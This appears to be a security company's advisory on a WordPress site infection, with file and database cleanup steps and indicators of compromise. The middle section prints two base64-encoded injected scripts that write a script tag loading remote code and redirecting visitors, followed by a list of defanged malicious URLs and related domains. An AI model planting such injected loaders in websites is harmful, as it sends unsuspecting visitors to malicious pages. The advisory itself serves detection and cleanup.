According to publicwww index, aprox. 1223 sites are currently affected by this hack.
Need help? Let us clean your site.
Site files cleanup notes
Almost all web folders will get infected, so it will be wise to start fresh 100%.
1. Perform overall backup – site files and database;
2. Move all web files outside root folder, to prevent further data loss;
3. Rebuild everything making sure plugins, themes are all malware free;
4. Restore wp-config.php and wp-content/uploads folder, but make sure these are malware free ( manual check ); and
5. Make sure core files, plugins and theme are up-to-date ( delete everything unused or abandoned );
Database cleanup
1. Use phpMyAdmin and look for “base64”, “cda-google.com” and “fromCharCode”;
2. Use a search and replace tool, to get rid of malicious entries:
https://wordpress.org/plugins/better-search-replace/
https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
3. Make sure no extra admin users were added by hackers;
Base64 Encrypted, Unescape & final scripthere: cda-google.com ( .txt file).
Base64 code: ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU2MyU2NCU2MSUyZCU2NyU2ZiU2ZiU2NyU2YyU2NSUyZSU2MyU2ZiU2ZCUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=
Script: hxxps://cda-google.com/Fwzz35
Redirect to: hxxps://mol16.biz/?p=hbqwemrsgm5gi3bpgm2tamq
Base64 code: ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=
Script: hxxps://kinonew.online/5cw2fk
Redirect to: hxxps://checkandgo.info/?p=gvsdezbtgm5gi3bpgi4da
Malicious URLs:
hxxps://cda-google.com/Fwzz35
hxxps://kinonew.online/5cw2fk
hxxps://checkandgo.info/?p=gvsdezbtgm5gi3bpgi4da
hxxps://mol16.biz/?p=hbqwemrsgm5gi3bpgm2tamq
hxxps://www.podrug.com/cck/i.php?ver=5.5.1
hxxps://mol16.biz/?p=ge2dmnbugy5gi3bpgqydamy
hxxps://www.remoingay.com/adminshop/core/i.php?ver=5.5.1
hxxps://www.podrug.com/cck/i.php?ver=5.5.1
hxxps://www.eftekes.com/images/i.php?ver=5.5.1
hxxps://www.abc-agency-azores.com/img/i.php?ver=5.5.1
hxxps://www.abc-agency-azores.com/img/i.php?ver=5.5.1
hxxp://arizonaenough.club/index.php?main_page=product_info&products_id=5961
hxxps://zp3code.com/sw/w_2.js
hxxps://mol17.biz/sw/w1s.js
Other domains hosted on 134.209.136.68: mol7.biz, mol9.biz, net06.biz, news98.biz, report3.biz, listlist.club, 27news.biz, 1mono.biz, 2solo.biz, 3mono.biz, 3sercher.biz, w5sercher.biz, w4sercher.biz.
Domain details: According to domaintools, domain was registered on 6/30/2020 and it’s pointing to Cloudflare.
Try our Free site check.
